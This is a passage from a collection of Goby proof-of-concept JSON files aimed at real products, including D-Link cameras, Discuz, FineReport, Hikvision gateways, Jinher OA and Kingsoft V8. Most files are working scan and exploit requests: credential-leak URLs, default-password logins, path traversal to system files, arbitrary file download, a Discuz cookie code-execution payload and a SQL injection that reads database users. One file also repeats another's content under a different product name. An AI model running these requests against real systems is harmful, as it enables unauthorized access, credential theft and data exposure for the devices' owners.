", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/config/getuser?index=0", 24 | "follow_redirect": true, 25 | "header": {}, 26 | "data_type": "text", 27 | "data": "" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "name", 45 | "bz": "" 46 | }, 47 | { 48 | "type": "item", 49 | "variable": "$body", 50 | "operation": "contains", 51 | "value": "pass", 52 | "bz": "" 53 | } 54 | ] 55 | }, 56 | "SetVariable": [] 57 | } 58 | ], 59 | "ExploitSteps": [ 60 | "AND", 61 | { 62 | "Request": { 63 | "method": "GET", 64 | "uri": "/config/getuser?index=0", 65 | "follow_redirect": true, 66 | "header": {}, 67 | "data_type": "text", 68 | "data": "" 69 | }, 70 | "SetVariable": [ 71 | "output|lastbody" 72 | ] 73 | } 74 | ], 75 | "PostTime": "2021-03-29 14:08:02", 76 | "GobyVersion": "1.8.237" 77 | } -------------------------------------------------------------------------------- /json/D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078", 3 | "Level": "1", 4 | "Tags": [ 5 | "账号密码泄露" 6 | ], 7 | "GobyQuery": "(app=\"DLink-Network-Camera\" || title=\"Document Error: Unauthorized\")", 8 | "Description": "D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面", 9 | "Product": "DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703", 10 | "Homepage": "PeiQi", 11 | "Author": "PeiQi", 12 | "Impact": "

🐏

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/config/getuser?index=0", 24 | "follow_redirect": true, 25 | "header": {}, 26 | "data_type": "text", 27 | "data": "" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "name", 45 | "bz": "" 46 | }, 47 | { 48 | "type": "item", 49 | "variable": "$body", 50 | "operation": "contains", 51 | "value": "pass", 52 | "bz": "" 53 | } 54 | ] 55 | }, 56 | "SetVariable": [] 57 | } 58 | ], 59 | "ExploitSteps": [ 60 | "AND", 61 | { 62 | "Request": { 63 | "method": "GET", 64 | "uri": "/config/getuser?index=0", 65 | "follow_redirect": true, 66 | "header": {}, 67 | "data_type": "text", 68 | "data": "" 69 | }, 70 | "SetVariable": [ 71 | "output|lastbody" 72 | ] 73 | } 74 | ], 75 | "PostTime": "2021-03-29 14:08:02", 76 | "GobyVersion": "1.8.237" 77 | } -------------------------------------------------------------------------------- /json/D_Link_AC_Centralized_management_system__Default_weak_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "D-Link AC Centralized management system Default weak password", 3 | "Level": "2", 4 | "Tags": [ 5 | "Default weak password" 6 | ], 7 | "GobyQuery": "title=\"AC集中管理平台\" && body=\"D-Link路由器管理页\" && app=\"DLink-Router\"", 8 | "Description": "D-Link AC management system has default account password, which can be used to obtain sensitive information (admin/admin)", 9 | "Product": "D-Link AC management system", 10 | "Homepage": "http://www.dlink.com.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "

Access to sensitive information

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/login.cgi", 23 | "follow_redirect": true, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded" 26 | }, 27 | "data_type": "text", 28 | "data": "user=admin&password=admin" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "not contains", 45 | "value": "flag=0", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-04-04 21:13:54", 54 | "GobyVersion": "1.8.255" 55 | } -------------------------------------------------------------------------------- /json/DedeCMS_InfoLeak_CVE_2018_6910.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DedeCMS InfoLeak CVE-2018-6910", 3 | "Level": "1", 4 | "Tags": [ 5 | "infoleak" 6 | ], 7 | "GobyQuery": "app=\"DedeCMS\"", 8 | "Description": "远程攻击者可通过对include/downmix.inc.php或inc/inc_archives_functions.php文件发送直接请求利用该漏洞获取完整路径。", 9 | "Product": "DedeCMS", 10 | "Homepage": "http://www.dedecms.com/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": false, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/include/downmix.inc.php", 27 | "follow_redirect": true, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "Fatal error", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$body", 54 | "operation": "contains", 55 | "value": "downmix.inc.php", 56 | "bz": "" 57 | }, 58 | { 59 | "type": "item", 60 | "variable": "$body", 61 | "operation": "contains", 62 | "value": "Call to undefined function helper()", 63 | "bz": "" 64 | } 65 | ] 66 | }, 67 | "SetVariable": [ 68 | "output|lastbody||" 69 | ] 70 | } 71 | ], 72 | "PostTime": "2021-11-14 16:43:48", 73 | "GobyVersion": "1.8.302" 74 | } -------------------------------------------------------------------------------- /json/Discuz_RCE_WOOYUN_2010_080723.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Discuz RCE WOOYUN-2010-080723", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", 8 | "Description": "由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。", 9 | "Product": "discuz", 10 | "Homepage": "https://www.discuz.net/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/viewthread.php?tid=10", 29 | "follow_redirect": false, 30 | "header": { 31 | "Cookie": "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=phpinfo();" 32 | }, 33 | "data_type": "text", 34 | "data": "", 35 | "set_variable": [] 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "PHP Version", 53 | "bz": "" 54 | }, 55 | { 56 | "type": "item", 57 | "variable": "$body", 58 | "operation": "contains", 59 | "value": "System", 60 | "bz": "" 61 | } 62 | ] 63 | }, 64 | "SetVariable": [ 65 | "output|lastbody|regex|" 66 | ] 67 | } 68 | ], 69 | "PostTime": "2021-11-17 13:57:54", 70 | "GobyVersion": "1.8.302" 71 | } -------------------------------------------------------------------------------- /json/Discuz_v72_SQLI.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Discuz v72 SQLI", 3 | "Level": "2", 4 | "Tags": [ 5 | "sqli" 6 | ], 7 | "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")", 8 | "Description": "discuz7.2论坛存在sql注入漏洞", 9 | "Product": "Discuz", 10 | "Homepage": "https://www.discuz.net/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://blog.csdn.net/weixin_40709439/article/details/82780606" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 ", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "81dc9bdb52d04dc20036dbd8313ed055", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "Discuz! info: MySQL Query Error", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "PostTime": "2021-11-16 17:48:16", 68 | "GobyVersion": "1.8.302" 69 | } -------------------------------------------------------------------------------- /json/FineReport_Directory_traversal.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "FineReport(帆软)报表系统目录遍历漏洞", 3 | "Level": "1", 4 | "Tags": [], 5 | "GobyQuery": "body=\"/WebReport/ReportServer\"", 6 | "Description": "漏洞影响\nFineReport v8.0\nFineReport v9.0", 7 | "Product": "FineReport(帆软)报表系统", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "luckying", 10 | "Impact": "", 11 | "Recommandation": "

undefined

", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../../../../../../../../../../../../etc¤tUserName=admin¤tUserId=1&isWebReport=true", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "etc/passwd", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-06-12 22:55:02", 50 | "GobyVersion": "1.8.268" 51 | } -------------------------------------------------------------------------------- /json/HIKVISION 视频编码设备接入网关 任意文件下载.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "HIKVISION 视频编码设备接入网关 任意文件下载", 3 | "Level": "1", 4 | "Tags": [ 5 | "任意文件下载" 6 | ], 7 | "GobyQuery": "(app=\"Hikvision-Video-coding-device-access-gateway\" || title=\"视频编码设备接入网关\")", 8 | "Description": "海康威视视频接入网关系统在页面/serverLog/downFile.php的参数fileName存在任意文件下载漏洞\n\n访问 http://xxx.xxx.xxx.xxx/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php 下载文件", 9 | "Product": "HIKVISION 视频编码设备接入网关", 10 | "Homepage": "https://www.hikvision.com/cn/", 11 | "Author": "PeiQi", 12 | "Impact": "

🐏

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "name": "Filename", 21 | "type": "select", 22 | "value": "../web/html/data/saveUserInfo.php,../../../../../../WINDOWS/system32/drivers/etc/hosts,../web/html/serverLog/downFile.php", 23 | "show": "" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "GET", 31 | "uri": "/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php", 32 | "follow_redirect": true, 33 | "header": {}, 34 | "data_type": "text", 35 | "data": "" 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "$file_name=", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [] 58 | } 59 | ], 60 | "ExploitSteps": [ 61 | "AND", 62 | { 63 | "Request": { 64 | "method": "GET", 65 | "uri": "/serverLog/downFile.php?fileName={{{Filename}}}", 66 | "follow_redirect": true, 67 | "header": {}, 68 | "data_type": "text", 69 | "data": "" 70 | }, 71 | "SetVariable": [ 72 | "output|lastbody" 73 | ] 74 | } 75 | ], 76 | "PostTime": "2021-02-06 14:59:46", 77 | "GobyVersion": "1.8.237" 78 | } -------------------------------------------------------------------------------- /json/Hsmedia_Hgateway_Default_account.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "D-Link AC Centralized management system Default weak password", 3 | "Level": "2", 4 | "Tags": [ 5 | "Default weak password" 6 | ], 7 | "GobyQuery": "title=\"AC集中管理平台\" && body=\"D-Link路由器管理页\" && app=\"DLink-Router\"", 8 | "Description": "D-Link AC management system has default account password, which can be used to obtain sensitive information (admin/admin)", 9 | "Product": "D-Link AC management system", 10 | "Homepage": "http://www.dlink.com.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "

Access to sensitive information

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/login.cgi", 23 | "follow_redirect": true, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded" 26 | }, 27 | "data_type": "text", 28 | "data": "user=admin&password=admin" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "not contains", 45 | "value": "flag=0", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-04-04 21:13:54", 54 | "GobyVersion": "1.8.255" 55 | } -------------------------------------------------------------------------------- /json/IFW8_Enterprise_router_Password_leakage_.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "IFW8 Enterprise router v4.31 Password leakage ", 3 | "Level": "2", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"ifw8-Router\" && body=\"企业级流控云路由器\"", 8 | "Description": "Bee Internet enterprise router V4.31 has unauthorized access to the interface, resulting in the attacker can get the router account password to take over the router through this vulnerability", 9 | "Product": "IFW8 Enterprise router v4.31", 10 | "Homepage": "ifw8.com", 11 | "Author": "PeiQi", 12 | "Impact": "

Through this vulnerability, we can get the router account password to take over the router

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/action/usermanager.htm", 24 | "follow_redirect": true, 25 | "header": {}, 26 | "data_type": "text", 27 | "data": "" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "pwd", 45 | "bz": "" 46 | } 47 | ] 48 | }, 49 | "SetVariable": [] 50 | } 51 | ], 52 | "ExploitSteps": [ 53 | "AND", 54 | { 55 | "Request": { 56 | "method": "GET", 57 | "uri": "/action/usermanager.htm", 58 | "follow_redirect": true, 59 | "header": {}, 60 | "data_type": "text", 61 | "data": "" 62 | }, 63 | "SetVariable": [ 64 | "output|lastbody" 65 | ] 66 | } 67 | ], 68 | "PostTime": "2021-04-04 23:23:15", 69 | "GobyVersion": "1.8.255" 70 | } -------------------------------------------------------------------------------- /json/JingHe_OA_C6_Default_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "JingHe OA C6 Default password", 3 | "Level": "2", 4 | "Tags": [ 5 | "Default password" 6 | ], 7 | "GobyQuery": "app=\"Jinher-OA\"", 8 | "Description": "JinHe OA C6 has the default account password of admin/000000, and the attacker will log in as an administrator", 9 | "Product": "JingHe OA C6", 10 | "Homepage": "jinher.com", 11 | "Author": "PeiQi", 12 | "Impact": "

The attacker will log in as an administrator

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/C6/Jhsoft.Web.login/AjaxForLogin.aspx", 23 | "follow_redirect": false, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded" 26 | }, 27 | "data_type": "text", 28 | "data": "type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw&" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "OK", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "系统管理员", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [] 58 | } 59 | ], 60 | "PostTime": "2021-04-04 22:43:50", 61 | "GobyVersion": "1.8.255" 62 | } -------------------------------------------------------------------------------- /json/Jinher_OA_C6_download.jsp_Arbitrary_file_read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "金和OA C6 download.jsp 任意文件读取漏洞", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "app=\"Jinher-OA\"", 6 | "Description": "金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "xml", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-06-12 11:18:49", 50 | "GobyVersion": "1.8.268" 51 | } -------------------------------------------------------------------------------- /json/Jinshan_V8.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "金山 V8", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "title=\"在线安装-V8+终端安全系统Web控制台\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/htmltopdf/downfile.php?filename=downfile.php", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "filename", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-04-25 11:24:32", 50 | "GobyVersion": "1.8.239" 51 | } -------------------------------------------------------------------------------- /json/Jitong_EWEBS_arbitrary_file_read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "极通EWEBS任意文件读取", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "body=\"极通软件\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "HasExp": true, 16 | "ExpParams": [ 17 | { 18 | "name": "file", 19 | "type": "input", 20 | "value": "../../../../../../../Windows/win.ini", 21 | "show": "" 22 | } 23 | ], 24 | "ScanSteps": [ 25 | "AND", 26 | { 27 | "Request": { 28 | "method": "POST", 29 | "uri": "/casmain.xgi", 30 | "follow_redirect": false, 31 | "header": { 32 | "Content-Type": "application/x-www-form-urlencoded" 33 | }, 34 | "data_type": "text", 35 | "data": "Language_S=../../../../../../../Windows/win.ini" 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "MAPI=", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "ExploitSteps": [ 54 | "AND", 55 | { 56 | "Request": { 57 | "method": "POST", 58 | "uri": "/casmain.xgi", 59 | "follow_redirect": false, 60 | "header": { 61 | "Content-Type": "application/x-www-form-urlencoded" 62 | }, 63 | "data_type": "text", 64 | "data": "Language_S={{{file}}}" 65 | }, 66 | "ResponseTest": { 67 | "type": "group", 68 | "operation": "AND", 69 | "checks": [ 70 | { 71 | "type": "item", 72 | "variable": "$body", 73 | "operation": "contains", 74 | "value": "MAPI=", 75 | "bz": "" 76 | } 77 | ] 78 | }, 79 | "SetVariable": [] 80 | } 81 | ], 82 | "PostTime": "2021-06-17 20:58:40", 83 | "GobyVersion": "1.8.268" 84 | } -------------------------------------------------------------------------------- /json/Jitong_EWEBS_phpinfo_leak.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "极通EWEBSphpinfo泄露", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "body=\"极通软件\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/testweb.php", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$body", 33 | "operation": "contains", 34 | "value": "PHP Version", 35 | "bz": "" 36 | } 37 | ] 38 | }, 39 | "SetVariable": [] 40 | } 41 | ], 42 | "PostTime": "2021-06-17 21:19:12", 43 | "GobyVersion": "1.8.268" 44 | } -------------------------------------------------------------------------------- /json/Kingsoft_V8_Arbitrary_file_read.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Kingsoft V8 Arbitrary file read", 3 | "Level": "1", 4 | "Tags": [], 5 | "GobyQuery": "app=\"kingsoft-V8+-Terminal-security-system\"", 6 | "Description": "There is an arbitrary file reading vulnerability in Jinshan V8 terminal security system, through which attackers can download arbitrary files from the server", 7 | "Product": "Kingsoft V8", 8 | "Homepage": "https://www.ejinshan.net/", 9 | "Author": "PeiQi", 10 | "Impact": "

through which attackers can download arbitrary files from the server

", 11 | "Recommandation": "", 12 | "References": [ 13 | "http://wiki.peiqi.tech" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/htmltopdf/downfile.php?filename=downfile.php", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "$filename", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-04-21 21:13:15", 50 | "GobyVersion": "1.8.258" 51 | } -------------------------------------------------------------------------------- /json/Kingsoft_V8_Default_weak_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Kingsoft V8 Default weak password", 3 | "Level": "2", 4 | "Tags": [ 5 | "Default weak password" 6 | ], 7 | "GobyQuery": "app=\"kingsoft-V8+-Terminal-security-system\"", 8 | "Description": "The default weak password exists in the Jinshan V8 terminal security system, so the attacker can obtain all the host permissions (admin/admin)", 9 | "Product": "Kingsoft V8", 10 | "Homepage": "https://www.ejinshan.net/", 11 | "Author": "PeiQi", 12 | "Impact": "

the attacker can obtain all the host permissions

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/inter/ajax.php?cmd=get_user_login_cmd", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "userSession", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-12 11:16:16", 52 | "GobyVersion": "1.8.258" 53 | } -------------------------------------------------------------------------------- /json/Kyan.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Kyan", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "title=\"platform - Login\" && body=\"login_files\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/hosts", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "UserName", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-04-25 12:36:15", 50 | "GobyVersion": "1.8.239" 51 | } -------------------------------------------------------------------------------- /json/Kyan_Account_password_leak.json: -------------------------------------------------------------------------------- 1 | { 2 